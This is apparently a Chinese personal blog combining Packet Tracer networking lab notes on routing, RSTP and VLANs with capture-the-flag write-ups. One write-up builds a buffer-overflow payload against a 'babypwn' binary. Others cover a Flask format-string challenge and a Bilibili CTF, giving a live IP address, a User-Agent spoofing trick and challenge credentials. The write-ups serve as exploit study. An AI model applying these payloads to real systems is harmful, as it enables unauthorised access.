JohnLyu的blog

橙汁事务所艾欧泽亚分部

0%

实验记录

网络初始构造

image-20201116170432981

拖动, 设置PC的IP
2台 PC 机的 ip, mask, gateway

1
2
3
4
5
6
7
PC1
192.168.1.2/24
192.168.1.1

PC2
192.168.2.2/24
192.168.2.1

配置路由器端口

配置r0

1
2
3
4
5
6
7
8
9
10
Router>enable
Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 192.168.1.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial2/0
Router(config-if)#ip address 192.168.3.1 255.255.255.0
Router(config-if)#no shutdown

配置r1

1
2
3
4
5
6
7
8
9
10
Router>enable
Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 192.168.2.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial2/0
Router(config-if)#ip address 192.168.3.2 255.255.255.0
Router(config-if)#no shutdown

配置r0和r1的静态路由

手动在r0上指定pc1所在的网段(192.168.2.0/24)在端口Serial2/0

1
ip route 192.168.2.0 255.255.255.0 Serial2/0

同理, 在r1配置

1
ip route 192.168.1.0 255.255.255.0 Serial2/0

配置完成后查看路由表:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Router#show ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
* - candidate default, U - per-user static route, o - ODR
P - periodic downloaded static route

Gateway of last resort is not set

C 192.168.1.0/24 is directly connected, FastEthernet0/0
S 192.168.2.0/24 is directly connected, Serial2/0
C 192.168.3.0/24 is directly connected, Serial2/0

测试

完成后分别在r0和pc0上测试ping pc1

1
2
3
4
5
6
Router#ping 192.168.2.2

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.2.2, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/10/23 ms
1
2
3
4
5
6
7
8
9
10
11
12
13
C:\>ping 192.168.2.2

Pinging 192.168.2.2 with 32 bytes of data:

Reply from 192.168.2.2: bytes=32 time=6ms TTL=126
Reply from 192.168.2.2: bytes=32 time=1ms TTL=126
Reply from 192.168.2.2: bytes=32 time=1ms TTL=126
Reply from 192.168.2.2: bytes=32 time=2ms TTL=126

Ping statistics for 192.168.2.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 6ms, Average = 2ms

实验目标

  1. 理解生成树协议工作原理;
  2. 掌握快速生成树协议 RSTP 基本配置方法;

实验背景

  1. 学校为了开展计算机教学和网络办公,建立的一个计算机教室和一个校办公区,这两处的计算机网络通过两台交换机互联组成内部校园网,为了提高网络的可靠性,作为网络管理员,你要用 2 条链路将交换机互连,现要求在交换机上做适当配置,是网络避免环路。

技术原理

  1. 生成树协议(spanning-tree),作用是在交换网络中提供冗余备份链路,并且解决交换网络中的环路问题;
  2. 生成树协议是利用 SPA 算法,在存在交换机环路的网络中生成一个没有环路的属性网络,运用该算法将交换网络的冗余备份链路从逻辑上断开,当主链路出现故障时,能够自动的切换到备份链路,保证数据的正常转发。
  3. 生成树协议版本:STP、RSTP(快速生成树协议)、MSTP(多生成树协议)。
  4. 生成树协议的特点收敛时间长。从主要链路出现故障到切换至备份链路需要 50 秒时间。
  5. 快速生成树在生成树协议的基础上增加了两种端口角色,替换端口或备份端口,分别作为根端口和指定端口。当根端口或指定端出现故障时,冗余端口不需要经过 50 秒的收敛时间,可以直接切换到替换端口或备份端口,从而实现 RSTP 协议小于 1 秒的快速收敛。

实验步骤

  1. 新建 packet tracer 拓扑图
  2. 默认情况下 STP 协议是启用的。通过两台交换机之间传送 BPDU 协议数据单元。选出跟交换机、根端口等,以便确定端口的转发状态。图中标记为黄色的端口处于 block 堵塞状态。
  3. 设置 RSTP。
  4. 查看交换机 show spanning-tree 状态,了解跟交换机和根端口情况。
  5. 通过更改交换机生成树的优先级 spanning-tree vlan 10 priority 4096 可以变化跟交换机的角色。
  6. 测试。当主链路处于 down 状态时候,能够自动的切换到备份链路,保证数据的正常转发。

实验记录

网络初始构造

拖动, 设置PC的IP
三台 PC 机的 ip, mask, gateway

1
2
3
4
5
6
7
8
9
PC1
192.168.1.2
255.255.255.0
192.168.1.1

PC2
192.168.1.3
255.255.255.0
192.168.1.1

此时直接关闭sw1的fa0/1端口

会有一段时间(约20s)的线路断开.

设置RSTP

在两台switch上分别设置Switch(config)#spanning-tree mode rapid-pvst

查看生成树:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Switch#sh spanning-tree 
VLAN0001
Spanning tree enabled protocol rstp
Root ID Priority 32769
Address 00D0.BC2B.9D5B
Cost 19
Port 1(FastEthernet0/1)
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID Priority 32769 (priority 32768 sys-id-ext 1)
Address 00E0.F9A2.673A
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
Aging Time 20

Interface Role Sts Cost Prio.Nbr Type
---------------- ---- --- --------- -------- --------------------------------
Fa0/1 Root FWD 19 128.1 P2p
Fa0/2 Altn BLK 19 128.2 P2p
Fa0/3 Desg FWD 19 128.3 P2p

确认已经采用了RSTP协议

再次断开一个端口, 可以观察到立刻(不到1秒)修改了网络拓扑结构.

扩展阅读: https://support.huawei.com/enterprise/zh/doc/EDOC1100094010/e6b45b04

实验目标

  1. 掌握交换机 Tag VLAN 的配置
  2. 掌握三层交换机基本配置方法;
  3. 掌握三层交换机 VLAN 路由的配置方法;
  4. 通过三层交换机实现 VLAN 间相互通信;

实验背景

某企业有两个主要部门,技术部和销售部,分处于不同的办公室,为了安全和便于管理对两个部门的主
机进行了 VLAN 的划分,技术部和销售部分处于不同的 VLAN,先由于业务的需求需要销售部和技术
部的主机能够相互访问,获得相应的资源,两个部门的交换机通过一台三层交换机进行了连接。
技术原理

三层交换机具备网络层的功能,实现 VLAN 相互访问的原理是:利用三层交换机的路由功能,通过识别数据包的 IP 地址,查找路由表进行选路转发,三层交换机利用直连路由可以实现不同 VLAN 之间的相互访问。三层交换机给接口配置 IP 地址。采用 SVI(交换虚拟接口)的方式实现 VLAN 间互连。SVI 是指为交换机中的 VLAN 创建虚拟接口,并且配置 IP 地址。

实验步骤

  1. 新建 packet tracer 拓扑图
  2. 在二层交换机上配置 VLAN2、VLAN3,分别将端口 2、端口 3 划分给 VLAN2、VLAN3。
  3. 将二层交换机与三层交换机相连的端口 fa 0/1 都定义为 tag Vlan 模式。
  4. 在三层交换机上配置 VLAN2、VLAN3,此时验证二层交换机 VLAN2、VLAN3 下的主机之间不能相互通信。
  5. 设置三层交换机 VLAN 间的通信,创建 VLAN2,VLAN3 的虚接口,并配置虚接口 VLAN2、VLAN3 的 IP 地址。
  6. 查看三层交换机路由表。
  7. 将二层交换机 VLAN2、VLAN3 下的主机默认网关分别设置为相应虚拟接口的 IP 地址。
  8. 验证二层交换机 VLAN2,VALN3 下的主机之间可以相互通信。

实验记录

拖出所有组件, 配置 IP 并连接

三台 PC 机的 ip, mask, gateway

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PC1
192.168.1.2
255.255.255.0
192.168.1.1

PC2
192.168.2.2
255.255.255.0
192.168.2.1

PC3
192.168.1.3
255.255.255.0
192.168.1.1

配置二层交换机并查看结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
en
conf t
vlan 2
exit
vlan 3
exit
int fa 0/2
switchport access vlan 2
int fa 0/3
switchport access vlan 3
int fa 0/1
switchport mode trunk
exit
exit
show vlan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/4, Fa0/5, Fa0/6, Fa0/7
Fa0/8, Fa0/9, Fa0/10, Fa0/11
Fa0/12, Fa0/13, Fa0/14, Fa0/15
Fa0/16, Fa0/17, Fa0/18, Fa0/19
Fa0/20, Fa0/21, Fa0/22, Fa0/23
Fa0/24, Gig0/1, Gig0/2
2 VLAN0002 active Fa0/2
3 VLAN0003 active Fa0/3
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 0 0
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 0 0
1003 tr 101003 1500 - - - - - 0 0
1004 fdnet 101004 1500 - - - ieee - 0 0
1005 trnet 101005 1500 - - - ibm - 0 0

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------

Remote SPAN VLANs
------------------------------------------------------------------------------

Primary Secondary Type Ports
------- --------- ----------------- ------------------------------------------

可以看到成功配置了两个VLAN应用在不同的端口.

初步配置三层交换机:

1
2
3
4
5
6
7
8
9
10
11
12
13
en
conf t
vlan 2
exit
vlan 3
exit
int fa 0/1
switchport trunk encapsulation dot1q
switchport mode trunk
exit
int fa 0/2
switchport access vlan 2
exit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Switch>
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#vlan 2
Switch(config-vlan)#exit
Switch(config)#vlan 3
Switch(config-vlan)#exit
Switch(config)#int fa 0/1
Switch(config-if)#switchport trunk encapsulation dot1q
Switch(config-if)#switchport mode trunk
Switch(config-if)#exit
Switch(config)#int fa 0/2
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit

无路由情况下的网络状态

此时尝试在 PC1 上 ping 另外两台 PC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
C:\>ping 192.168.1.3

Pinging 192.168.1.3 with 32 bytes of data:

Reply from 192.168.1.3: bytes=32 time=1ms TTL=128
Reply from 192.168.1.3: bytes=32 time<1ms TTL=128
Reply from 192.168.1.3: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.1.3:
Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 1ms, Average = 0ms

Control-C
^C
C:\>ping 192.168.2.2

Pinging 192.168.2.2 with 32 bytes of data:


Ping statistics for 192.168.2.2:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

同一 VLAN 下可以 ping 通, 不同 VLAN 无法 ping 通

配置三层交换机的路由:

1
2
3
4
5
6
7
8
9
10
11
12
ip routing
interface vlan 2
ip address 192.168.1.1 255.255.255.0
no shutdown
exit
interface vlan 3
ip address 192.168.2.1 255.255.255.0
no shutdown
exit
exit
show ip route
show vlan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
Switch(config)#ip routing
Switch(config)#interface vlan 2
Switch(config-if)#ip address 192.168.1.1 255.255.255.0
Switch(config-if)#no shutdown
Switch(config-if)#exit
Switch(config)#interface vlan 3
Switch(config-if)#ip address 192.168.2.1 255.255.255.0
Switch(config-if)#no shutdown
Switch(config-if)#exit
Switch(config)#exit
Switch#show ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
* - candidate default, U - per-user static route, o - ODR
P - periodic downloaded static route

Gateway of last resort is not set

C 192.168.1.0/24 is directly connected, Vlan2
C 192.168.2.0/24 is directly connected, Vlan3


Switch#show vlan
%LINK-5-CHANGED: Interface Vlan2, changed state to up

%LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan2, changed state to up

%LINK-5-CHANGED: Interface Vlan3, changed state to up

%LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan3, changed state to up

%SYS-5-CONFIG_I: Configured from console by console


VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/3, Fa0/4, Fa0/5, Fa0/6
Fa0/7, Fa0/8, Fa0/9, Fa0/10
Fa0/11, Fa0/12, Fa0/13, Fa0/14
Fa0/15, Fa0/16, Fa0/17, Fa0/18
Fa0/19, Fa0/20, Fa0/21, Fa0/22
Fa0/23, Fa0/24, Gig0/1, Gig0/2
2 VLAN0002 active Fa0/2
3 VLAN0003 active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 0 0
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 0 0
1003 tr 101003 1500 - - - - - 0 0
1004 fdnet 101004 1500 - - - ieee - 0 0
1005 trnet 101005 1500 - - - ibm - 0 0

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------

Remote SPAN VLANs
------------------------------------------------------------------------------

Primary Secondary Type Ports
------- --------- ----------------- ------------------------------------------

有路由情况下的网络状态

再次测试从 PC1 到 PC2 和 PC3 的 ping

1
2
3
4
5
6
7
8
9
10
11
12
13
C:\>ping 192.168.2.2

Pinging 192.168.2.2 with 32 bytes of data:

Reply from 192.168.2.2: bytes=32 time=1ms TTL=127
Reply from 192.168.2.2: bytes=32 time<1ms TTL=127
Reply from 192.168.2.2: bytes=32 time<1ms TTL=127
Reply from 192.168.2.2: bytes=32 time=1ms TTL=127

Ping statistics for 192.168.2.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 1ms, Average = 0ms

可以 ping 通, 符合预期.

小结:

ip routing 语句在实验手册中没有, 但是影响很大, 不开启 ip route 功能会导致三层交换机的路由无效

no shutdown 不是必须的, 至少在 switch 中, port 是默认打开的状态

语句中 switchport trunk encapsulation dot1q 的作用是开启 802.1Q 协议

To enable IEEE 802.1Q encapsulation of traffic on a specified subinterface, use the encapsulation dot1q command. To disable encapsulation, use the no form of this command.

为什么 802.1Q 协议是必须的?

SW2(config-if)#switchport mode trunk
Command rejected: An interface whose trunk encapsulation is “Auto” can not be configured to “trunk” mode.

SW1(config-if)#switchport trunk encapsulation ?

dot1q      Interface uses only 802.1q trunking encapsulation when trunking
isl        Interface uses only ISL trunking encapsulation when trunking
negotiate  Device will negotiate trunking encapsulation with peer on interface

简介

题目文件

Never done any kind of binary exploitation before? This should get you started. Grab some gdb or radare, turn off ASLR, forget about stack canaries, and let the fun begin.

检查文件状态:

1
2
3
4
5
6
7
[*] babypwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments

OK, 看起来十分的baby. no ASLK, no canaries. 甚至给出了源代码.

开启了PIE, 但是服务器没有开启ASLR.

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <assert.h>
#include <openssl/md5.h>

void calc_string_md5(char *string, char md5[MD5_DIGEST_LENGTH]) {
MD5_CTX c;
MD5_Init(&c);
MD5_Update(&c, string, strlen(string));
MD5_Final(md5, &c);
}

unsigned char char_to_repr(char in) {
if (in >= '0' && in <= '9')
return in - '0';
if (in >= 'a' && in <= 'f')
return in - 'a' + 0xa;
if (in >= 'A' && in <= 'F')
return in - 'A' + 0xa;
assert("not in hex digit range" && 0);
}

void hex_to_binary(char *in, unsigned char* out, size_t length) {
size_t i;
assert("length must be even" && (length % 2) == 0);

length /= 2;
for (i = 0; i < length; i++) {
out[i] = char_to_repr(in[i * 2]) << 4 | char_to_repr(in[i * 2 + 1]);
}
}

int check_user_hash(char* flag) {
unsigned char user_md5[MD5_DIGEST_LENGTH * 2 + 1];
unsigned char flag_md5[MD5_DIGEST_LENGTH];

/* calculate MD5("CSR{...}") */
calc_string_md5(flag, flag_md5);

/* read user input, convert to hexadecimal */
gets(user_md5);
hex_to_binary(user_md5, user_md5, strlen(user_md5));

return memcmp(flag_md5, user_md5, MD5_DIGEST_LENGTH) ? 0 : 1;
}

int main() {
char flag[0x500];
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stderr, 0, _IONBF, 0);

/* read flag */
int fd = open("flag.txt", O_RDONLY);
assert("unable to open flag file" && fd >= 0);
flag[read(fd, flag, sizeof(flag))] = '\0';
close(fd);

puts("It's easy. Give me MD5($flag), get $flag in return.");

/* if md5 is correct, print flag */
if(check_user_hash(flag)) {
puts(flag);
} else {
puts("nope");
}

return 0;
}

初步判断是gets(user_md5);存在栈溢出.

反编译

查看其汇编:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
000000000000143e
; ================ B E G I N N I N G O F P R O C E D U R E ================

; Variables:
; var_68: int64_t, -104
; var_70: int64_t, -112
; var_78: int64_t, -120
; var_80: int64_t, -128


check_user_hash:
0000000000001440 push r12 ; Begin of unwind block (FDE at 0x220c), CODE XREF=main+145
0000000000001442 mov r12, rdi
0000000000001445 push rbp
0000000000001446 sub rsp, 0x78
000000000000144a lea rbp, qword [rsp+0x80+var_70]
000000000000144f mov rdi, rbp ; argument "c" for method j_MD5_Init
0000000000001452 call j_MD5_Init ; MD5_Init
0000000000001457 mov rdi, r12 ; argument "__s" for method j_strlen
000000000000145a call j_strlen ; strlen
000000000000145f mov rsi, r12 ; argument "data" for method j_MD5_Update
0000000000001462 mov rdi, rbp ; argument "c" for method j_MD5_Update
0000000000001465 mov rdx, rax ; argument "len" for method j_MD5_Update
0000000000001468 call j_MD5_Update ; MD5_Update
000000000000146d mov rsi, rbp ; argument "c" for method j_MD5_Final
0000000000001470 mov rdi, rsp ; argument "md" for method j_MD5_Final
0000000000001473 call j_MD5_Final ; MD5_Final
0000000000001478 mov rdi, rbp ; argument "__str" for method j_gets
000000000000147b call j_gets ; gets
0000000000001480 mov rdi, rbp ; argument "__s" for method j_strlen
0000000000001483 call j_strlen ; strlen
0000000000001488 mov rsi, rbp ; argument #2 for method hex_to_binary
000000000000148b mov rdi, rbp ; argument #1 for method hex_to_binary
000000000000148e mov rdx, rax ; argument #3 for method hex_to_binary
0000000000001491 call hex_to_binary ; hex_to_binary
0000000000001496 mov rdx, qword [rsp+0x80+var_78]
000000000000149b mov rax, qword [rsp+0x80+var_80]
000000000000149f xor rdx, qword [rsp+0x80+var_68]
00000000000014a4 xor rax, qword [rsp+0x80+var_70]
00000000000014a9 or rdx, rax
00000000000014ac sete al
00000000000014af add rsp, 0x78
00000000000014b3 movzx eax, al
00000000000014b6 pop rbp
00000000000014b7 pop r12
00000000000014b9 ret

动态调试

发现因为其大量使用rbp当临时变量, 导致对栈的静态分析很费力.

转到gdb动态调试看看.

将断点下在j_gets处.

可以看到此时的堆栈大概如图所示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

0x555555555478 <check_user_hash+56> mov rdi, rbp
0x55555555547b <check_user_hash+59> call gets@plt <gets@plt>

0x555555555480 <check_user_hash+64> mov rdi, rbp
0x555555555483 <check_user_hash+67> call strlen@plt <strlen@plt>

0x555555555488 <check_user_hash+72> mov rsi, rbp
0x55555555548b <check_user_hash+75> mov rdi, rbp
0x55555555548e <check_user_hash+78> mov rdx, rax
0x555555555491 <check_user_hash+81> call hex_to_binary <hex_to_binary>

0x555555555496 <check_user_hash+86> mov rdx, qword ptr [rsp + 8]
0x55555555549b <check_user_hash+91> mov rax, qword ptr [rsp]
───────────────────────────────────────[ STACK ]────────────────────────────────────────
00:0000│ rdi rsp 0x7fffffffdcc0 ◂— 0xa /* '\n' */
01:00080x7fffffffdcc8 —▸ 0x5555555580a8 (stdout@@GLIBC_2.2.5) —▸ 0x7ffff7c3b7
60 (_IO_2_1_stdout_) ◂— xchg dword ptr [rax], ebp /* 0xfbad2887 */
02:0010│ rsi rbp 0x7fffffffdcd0 ◂— 0xefcdab8967452301
03:00180x7fffffffdcd8 ◂— 0x1032547698badcfe
04:00200x7fffffffdce0 ◂— 0xf8
05:00280x7fffffffdce8 ◂— 'CSR{this-is-not-the-real-flag}\n'
06:00300x7fffffffdcf0 ◂— '-is-not-the-real-flag}\n'
07:00380x7fffffffdcf8 ◂— 'the-real-flag}\n'
─────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
► f 0 555555555473 check_user_hash+51
f 1 555555555176 main+150
f 2 7ffff7aa309b __libc_start_main+235
────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 20
00:0000│ rdi rsp 0x7fffffffdcc0 ◂— 0xa /* '\n' */
01:00080x7fffffffdcc8 —▸ 0x5555555580a8 (stdout@@GLIBC_2.2.5) —▸ 0x7ffff7c3b7
60 (_IO_2_1_stdout_) ◂— xchg dword ptr [rax], ebp /* 0xfbad2887 */
02:0010│ rsi rbp 0x7fffffffdcd0 ◂— 0xefcdab8967452301
03:00180x7fffffffdcd8 ◂— 0x1032547698badcfe
04:00200x7fffffffdce0 ◂— 0xf8
05:00280x7fffffffdce8 ◂— 'CSR{this-is-not-the-real-flag}\n'
06:00300x7fffffffdcf0 ◂— '-is-not-the-real-flag}\n'
07:00380x7fffffffdcf8 ◂— 'the-real-flag}\n'
08:00400x7fffffffdd00 ◂— 0xa7d67616c662d /* '-flag}\n' */
09:00480x7fffffffdd08 ◂— 0x0
... ↓
0d:00680x7fffffffdd28 ◂— 0x1f
0e:00700x7fffffffdd30 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
0f:00780x7fffffffdd38 ◂— 0x3
10:00800x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:00880x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
13:00980x7fffffffdd58 ◂— '-is-not-the-real-flag}\n'

而往下执行一步, 输入一个正常的md5, cea404648bf1504a431f48e2d7788d74, 再次观察堆栈:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
00:0000│ rsp      0x7fffffffdcc0 ◂— 0x1be3e93037b0d224
01:00080x7fffffffdcc8 ◂— 0x65eb4ac4ed908384
02:0010│ rax rbp 0x7fffffffdcd0 ◂— 'cea404648bf1504a431f48e2d7788d74'
03:00180x7fffffffdcd8 ◂— '8bf1504a431f48e2d7788d74'
04:00200x7fffffffdce0 ◂— '431f48e2d7788d74'
05:00280x7fffffffdce8 ◂— 'd7788d74'
06:00300x7fffffffdcf0 ◂— 0x0
... ↓
0e:00700x7fffffffdd30 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
0f:00780x7fffffffdd38 ◂— 0x3
10:00800x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:00880x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
13:00980x7fffffffdd58 ◂— '-is-not-the-real-flag}\n'

很容易看到我们的输入是从当前的rbp的位置输入的. 因此可以计算出覆盖到ret位置:

1
0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test   eax, eax

所需要的偏移量.

分析

下一步是观察需要返回到哪个位置:

观察main函数的assembly:

1
2
3
4
                     loc_1193:
0000000000001193 mov rdi, r12 ; argument "__s" for method j_puts, CODE XREF=main+152
0000000000001196 call j_puts ; puts
000000000000119b jmp loc_1186

可以看到这一段就是成功返回flag的分支.

因为开启了PIE, 静态分析的地址不能直接用于爆破, 但是因为没有开启ASLR, 本地动态调试的地址可以拿来直接用.

确定ret的地址是0x555555555193.

接下来继续单步调试.

如果我们直接构建如下payload:

1
2
offset = 0x78
payload = b'a' * offset + p64(0x555555555193)

并不能正确输出flag.

因为:

  1. hex_to_binary 会检测输入字符串长度是否是偶数
  2. 打印的地址也被覆盖成b'aaaaaaaa'了.

首先解决问题1, 将payload的首位改成\0, 字符串长度就是0, 符合要求.

然后解决问题2, 回顾一下最开始的check_user_hash函数的结尾:

1
2
00000000000014b7         pop        r12
00000000000014b9 ret

ret之前最后一步是把上一行栈给pop到r12中, 而puts的参数正好是r12.

动态调试的结果也说明了这一点.

1
2
3
10:00800x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:00880x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'

返回地址的上一行是flag的指针.

因此构建payload的时候需要保护这一行. 再次感谢关闭了ASLR, 因此我们无需通过各种泄露找到地址, 只需要把本地调试的地址写进payload中.

新的payload大是这样:

1
2
offset = 0x78
payload = b'\0' + b'a' * (offset - 1) + p64(0x7fffffffdd50) + p64(0x555555555193)

再次尝试, 依旧失败.

原因在于gets函数会给传递的string的最后自动增加一个\0

而不幸的是, ret的下一行就是储存flag字符串的栈. 因此会覆盖字符串的第一位, 进而导致puts打印出空.

幸而是64bit程序, 地址最高位本来就是0 (0x7fffffffdd50 只占据6个字节, 最高位是0) 而小端序的最高位在内存的高位, 字符串写入是从低到高, 自动添加的\0会符合地址中本就存在的\x00

构建出最后的payload

1
2
offset = 0x70
payload = b'\0' + b'a' * (offset - 1) + p64(0x7fffffffdd50) + p64(0x555555555193)[:-1]

然而, 这个payload依旧打不出flag, 因为服务器的libc和本地有不同.

不过这点小问题在两个地址上加一个偏移然后爆破就好了.

  • hint: python format

wechat id for you is here

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import html
import secrets

from flask import Flask, Response, request

from flag import FLAG, GIFT

app = Flask(__name__)


def read(filename, encoding='utf-8'):
with open(filename, 'r', encoding=encoding) as fin:
return fin.read()


@app.route('/', methods=['GET'])
def index():
guess = request.args.get('guess')

if not guess:
return Response(read(__file__), mimetype='text/plain')

if guess == secrets.token_hex(16):
return 'Nice guess! Your flag is {}'.format(FLAG)
elif guess == "giveup":
return 'Give up is OK, sweet gift for you: {}'.format(GIFT)

fs = ('Better luck next time!<br/>'
'Your IP: {r.remote_addr}<br/>'
'Your User Agent: {r.user_agent}<br/>'
'Your Guess: ' + html.escape(guess))
return fs.format(r=request)


if __name__ == '__main__':
app.run(host='0.0.0.0', port=15000)

哔哩哔哩的程序员节CTF

0x00

序号从1开始…跳过

0x01 & 0x02

审查源码之后可以看到`

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<script>
$.ajax({
url: "api/admin",
type: "get",
success:function (data) {
//console.log(data);
if (data.code == 200){
// 如果有值:前端跳转
var input = document.getElementById("flag1");
input.value = String(data.data);
} else {
// 如果没值
$('#flag1').html("接口异常,请稍后再试~");
}
}
})
</script>
<script>
$.ajax({
url: "api/ctf/2",
type: "get",
success:function (data) {
//console.log(data);
if (data.code == 200){
// 如果有值:前端跳转
$('#flag2').html("flag2: " + data.data);
} else {
// 如果没值
$('#flag2').html("需要使用bilibili Security Browser浏览器访问~");
}
}
})
</script>

首先访问http://45.113.201.36/api/admin, 完成签到.

然后访问http://45.113.201.36/api/ctf/2, 抓包后修改header中的UA为bilibili Security Browser, 拿到flag.

0x03

查看html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<script>
//falg 3

$("#submit").click(function(){

$.ajax({
url: "api/ctf/3",
type: "post",
contentType: "application/json",
dataType:"json",
data: JSON.stringify({
username: $("#name").val(),
passwd: $("#subject").val(),
}),
success:function (data) {
if (data.code == 200){
alert("flag is: " + data.data);
} else {
alert("用户名或密码错误~");
}
}
})
});
</script>
  好像没啥问题, 尝试最基础的sqli...

几种注入都不对…放弃

答案是admin/bilibili

0x04

抓包发现

1
2
3
4
5
6
7
8
9
10
GET /api/ctf/4 HTTP/1.1
Host: 45.113.201.36
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://45.113.201.36/superadmin.html
